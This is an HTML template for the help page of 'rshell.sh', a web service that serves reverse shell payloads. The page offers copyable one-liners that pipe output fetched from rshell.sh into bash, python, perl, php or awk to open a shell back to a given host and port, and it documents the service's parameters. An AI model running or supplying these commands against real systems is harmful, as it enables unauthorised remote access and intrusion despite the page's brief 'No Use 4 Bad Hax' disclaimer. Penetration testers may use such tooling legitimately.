{% extends 'base.html' %}

{% block head %}
<style>
	table,th,td {
	  border: 1px solid white;
	}
</style>
{% endblock %}

{% block body %}

<h1>rshell.sh - Help Page</h1>
<h2>Reverse Shell Payload Microservice</h2>
<hr>
<a name="SupportedLangs"></a>
<h3><u>Supported Languages</u></h3>
  <table>
	<tr>
      <th>Language</th>
      <th>Stdin</th>
	  <th>Xargs</th>
	</tr>
	<tr>
      <td>Bash</td>
      <td>
		<button onclick="copyBashStdin()">
		  <span title="Copy: curl -s rshell.sh/127.0.0.1/12345 | bash">✅</span>
		</button>
		<script>
		  function copyBashStdin() {
			var bashStdinStr =  "curl -s rshell.sh/127.0.0.1/12345 | bash";
			navigator.clipboard.writeText(bashStdinStr);
			alert("Text Copied!" 
				+ "\n\n\t" + bashStdinStr);
		  }
		</script>
	  </td>
      <td>
		<button onclick="copyBashXargs()">
		  <span title="Copy: curl -s rshell.sh/127.0.0.1/12345&q=y | xargs bash -c">✅</span>
		</button>
		<script>
		  function copyBashXargs() {
			var bashXargsStr =  "curl -s rshell.sh/127.0.0.1/12345?q=y | xargs bash -c";
			navigator.clipboard.writeText(bashXargsStr);
			alert("Text Copied!" 
				+ "\n\n\t" + bashXargsStr);
		  }
		</script>
	  </td>
	</tr>
	<tr>
      <td>Python3</td>
      <td>
		<button onclick="copyPythonStdin()">
		  <span title="Copy: curl -s rshell.sh/python/127.0.0.1/12345 | python">✅</span>
		</button>
		<script>
		  function copyPythonStdin() {
			var pythonStdinStr =  "curl -s rshell.sh/python/127.0.0.1/12345 | python";
			navigator.clipboard.writeText(pythonStdinStr);
			alert("Text Copied!" 
				+ "\n\n\t" + pythonStdinStr);
		  }
		</script>
	  </td>
      <td>
		<button onclick="copyPythonXargs()">
		  <span title="Copy: curl -s rshell.sh/python/127.0.0.1/12345?q=y | xargs python -c">✅</span>
		</button>
		<script>
		  function copyPythonXargs() {
			var pythonXargsStr =  "curl -s rshell.sh/python/127.0.0.1/12345?q=y | xargs python -c";
			navigator.clipboard.writeText(pythonXargsStr);
			alert("Text Copied!" 
				+ "\n\n\t" + pythonXargsStr);
		  }
		</script>
	  </td>
	</tr>
	<tr>
      <td>Perl</td>
      <td>
		<button onclick="copyPerlStdin()">
		  <span title="Copy: curl -s rshell.sh/perl/127.0.0.1/12345 | perl">✅</span>
		</button>
		<script>
		  function copyPerlStdin() {
			var perlStdinStr =  "curl -s rshell.sh/perl/127.0.0.1/12345 | perl";
			navigator.clipboard.writeText(perlStdinStr);
			alert("Text Copied!" 
				+ "\n\n\t" + perlStdinStr);
		  }
		</script>
	  </td>
      <td>
		<button onclick="copyPerlXargs()">
		  <span title="Copy: curl -s rshell.sh/perl/127.0.0.1/12345?q=y | xargs python -e">✅</span>
		</button>
		<script>
		  function copyPerlXargs() {
			var perlXargsStr =  "curl -s rshell.sh/perl/127.0.0.1/12345?q=y | xargs perl -e";
			navigator.clipboard.writeText(perlXargsStr);
			alert("Text Copied!" 
				+ "\n\n\t" + perlXargsStr);
		  }
		</script>
	  </td>
	</tr>
	<tr>
      <td>PHP</td>
      <td>
		<button onclick="copyPHPStdin()">
		  <span title="No Stdin Option For PHP.">❌</span>
		</button>
		<script>
		  function copyPHPStdin() {
			alert("No Stdin Option for PHP.");
		  }
		</script>
	  </td>
      <td>
		<button onclick="copyPHPXargs()">
		  <span title="Copy: curl -s rshell.sh/php/127.0.0.1/12345?q=y | xargs php -r">✅</span>
		</button>
		<script>
		  function copyPHPXargs() {
			var phpXargsStr =  "curl -s rshell.sh/php/127.0.0.1/12345?q=y | xargs php -r";
			navigator.clipboard.writeText(phpXargsStr);
			alert("Text Copied!" 
				+ "\n\n\t" + phpXargsStr);
		  }
		</script>
	  </td>
	</tr>
	<tr>
      <td>Awk</td>
      <td>
		<button onclick="copyAwkStdin()">
		  <span title="No Stdin Option For Awk.">❌</span>
		</button>
		<script>
		  function copyAwkStdin() {
			alert("No Stdin Option for Awk.");
		  }
		</script>
	  </td>
      <td>
		<button onclick="copyAwkXargs()">
		  <span title="Copy: curl -s rshell.sh/awk/127.0.0.1/12345?q=y | xargs awk">✅</span>
		</button>
		<script>
		  function copyAwkXargs() {
			var awkXargsStr =  "curl -s rshell.sh/awk/127.0.0.1/12345?q=y | xargs awk";
			navigator.clipboard.writeText(awkXargsStr);
			alert("Text Copied!" 
				+ "\n\n\t" + awkXargsStr);
		  }
		</script>
	  </td>
	</tr>
  </table>
<h3><u>GET Parameters</u></h3>
  <table>
	<tr>
      <th>Key</th>
      <th>Value</th>
	  <th>Example</th>
	  <th>Description</th>
	</tr>
	<tr>
      <td>q</td>
      <td>y</td>
	  <td><a href="/10.0.0.1/1234?q=y">rshell.sh/10.0.0.1/1234?q=y</a></td>
	  <td>Output Wrapped in Single Quotes.</td>
	</tr>
  </table>
<h3><u>API Options</u></h3>
  <table>
	<tr>
      <th>Key</th>
      <th>Value</th>
	  <th>Description</th>
	</tr>
	<tr>
      <td>host</td>
      <td>IPv4_ADDRESS</td>
	  <td>IPv4 Address of Remote Host.</td>
	</tr>
	<tr>
      <td>port</td>
      <td>PORT_NUMBER</td>
	  <td>Target Port of Remote Host.</td>
	</tr>
	<tr>
      <td>lang</td>
      <td>See, <a href="#SupportedLangs">Supported Langs</a></td>
	  <td>Reverse shell payload language.</td>
	</tr>
  </table>
<h3><u>Tips</u></h3>
<ul>
<li>Python Shell Reset</li>
<pre>
curl -s rshell.sh/reset
</pre>
<li>Command Line Friendly Help Menu</li>
<pre>
curl -s rshell.sh/help
</pre>
</ul>
<br>
<p style="color: red"><u><b>No Use 4 Bad Hax!!!</b></u></p>

<br>
<a href="https://github.com/BlueSquare23/Rshell.sh">Project's Github</a>
<a href="/">Main Page</a>

{% endblock %}
